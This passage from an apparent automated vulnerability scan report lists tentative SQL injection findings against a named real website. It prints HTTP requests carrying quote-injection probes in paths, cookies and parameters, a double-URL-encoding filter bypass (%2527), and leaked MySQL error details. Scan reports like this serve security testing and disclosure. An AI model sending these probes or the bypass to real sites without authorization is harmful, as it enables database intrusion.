Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 05:09:14 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 1ee73a388da0bb7ec3d7afe3beccac53=93b4d0d3c5817b851bdd0e6edb426ad7; path=/
Last-Modified: Sat, 06 Nov 2010 05:09:15 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 4718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...

1.4. http://www.analyticspros.com/administrator/templates/khepri/favicon.ico [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /administrator/templates/khepri/favicon.ico

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /administrator/templates/khepri%2527/favicon.ico HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/administrator/
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 404 Component not found
Date: Sat, 06 Nov 2010 08:26:08 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sat, 06 Nov 2010 08:26:11 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 3015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...
<title>404 - Error: 404</title>
...[SNIP]...

Request 2

GET /administrator/templates/khepri%2527%2527/favicon.ico HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/administrator/
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 08:26:12 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.5. http://www.analyticspros.com/blog.html [__utmmobile cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog.html

Issue detail

The __utmmobile cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmmobile cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the __utmmobile cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog.html?utm_source=members-list&utm_medium=email&utm_campaign=monday-QnA&utm_link=main-promo-link HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/55-googleanalytics/117-campaign-tracking-with-google-analytics-email-banners-and-more.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c%2527; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:17:51 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:17:52 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 08:17:52 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30159


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<dt class="error">
...[SNIP]...

Request 2

GET /blog.html?utm_source=members-list&utm_medium=email&utm_campaign=monday-QnA&utm_link=main-promo-link HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/55-googleanalytics/117-campaign-tracking-with-google-analytics-email-banners-and-more.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c%2527%2527; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:17:53 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:17:58 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 08:17:58 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29889


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.6. http://www.analyticspros.com/blog.html [apros2.0_tpl cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog.html

Issue detail

The apros2.0_tpl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apros2.0_tpl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog.html HTTP/1.1
Host: www.analyticspros.com
Proxy-Connection: keep-alive
Referer: http://www.analyticspros.com/about.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; fpssCookie=true; apros2.0_tpl=apros2.0'; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_t=1288999540201%3B1288999540201%3B1288999599844%3B1%3B2; __utmmobile=0xade0ac5896f84b3c; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; __utmb=26076141.10.9.1288999622937

Response 1

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:44:00 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog.html HTTP/1.1
Host: www.analyticspros.com
Proxy-Connection: keep-alive
Referer: http://www.analyticspros.com/about.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; fpssCookie=true; apros2.0_tpl=apros2.0''; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_t=1288999540201%3B1288999540201%3B1288999599844%3B1%3B2; __utmmobile=0xade0ac5896f84b3c; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; __utmb=26076141.10.9.1288999622937

Response 2

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:44:02 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.7. http://www.analyticspros.com/blog.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog.html?1'=1 HTTP/1.1
Host: www.analyticspros.com
Proxy-Connection: keep-alive
Referer: http://www.analyticspros.com/about.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; fpssCookie=true; apros2.0_tpl=apros2.0; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_t=1288999540201%3B1288999540201%3B1288999599844%3B1%3B2; __utmmobile=0xade0ac5896f84b3c; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; __utmb=26076141.10.9.1288999622937

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:19:03 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog.html?1''=1 HTTP/1.1
Host: www.analyticspros.com
Proxy-Connection: keep-alive
Referer: http://www.analyticspros.com/about.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; fpssCookie=true; apros2.0_tpl=apros2.0; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_t=1288999540201%3B1288999540201%3B1288999599844%3B1%3B2; __utmmobile=0xade0ac5896f84b3c; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; __utmb=26076141.10.9.1288999622937

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:19:04 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:19:06 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 08:19:06 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 28991


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.8. http://www.analyticspros.com/blog.html [optimizelyEndUserId cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog.html

Issue detail

The optimizelyEndUserId cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyEndUserId cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog.html HTTP/1.1
Host: www.analyticspros.com
Proxy-Connection: keep-alive
Referer: http://www.analyticspros.com/about.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; optimizelyEndUserId=oeu1288999536936r0.7062593474984169'; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; fpssCookie=true; apros2.0_tpl=apros2.0; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_t=1288999540201%3B1288999540201%3B1288999599844%3B1%3B2; __utmmobile=0xade0ac5896f84b3c; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; __utmb=26076141.10.9.1288999622937

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:05:32 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog.html HTTP/1.1
Host: www.analyticspros.com
Proxy-Connection: keep-alive
Referer: http://www.analyticspros.com/about.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; optimizelyEndUserId=oeu1288999536936r0.7062593474984169''; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; fpssCookie=true; apros2.0_tpl=apros2.0; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_t=1288999540201%3B1288999540201%3B1288999599844%3B1%3B2; __utmmobile=0xade0ac5896f84b3c; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; __utmb=26076141.10.9.1288999622937

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:05:34 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.9. http://www.analyticspros.com/blog.html [utm_campaign parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog.html

Issue detail

The utm_campaign parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the utm_campaign parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog.html?utm_source=members-list&utm_medium=email&utm_campaign=monday-QnA'&utm_link=main-promo-link HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/55-googleanalytics/117-campaign-tracking-with-google-analytics-email-banners-and-more.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:06:53 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog.html?utm_source=members-list&utm_medium=email&utm_campaign=monday-QnA''&utm_link=main-promo-link HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/55-googleanalytics/117-campaign-tracking-with-google-analytics-email-banners-and-more.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:06:53 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:06:56 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 08:06:57 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30090


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.10. http://www.analyticspros.com/blog.html [utm_source parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog.html

Issue detail

The utm_source parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the utm_source parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the utm_source request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog.html?utm_source=members-list%2527&utm_medium=email&utm_campaign=monday-QnA&utm_link=main-promo-link HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/55-googleanalytics/117-campaign-tracking-with-google-analytics-email-banners-and-more.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:04:38 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog.html?utm_source=members-list%2527%2527&utm_medium=email&utm_campaign=monday-QnA&utm_link=main-promo-link HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/55-googleanalytics/117-campaign-tracking-with-google-analytics-email-banners-and-more.html
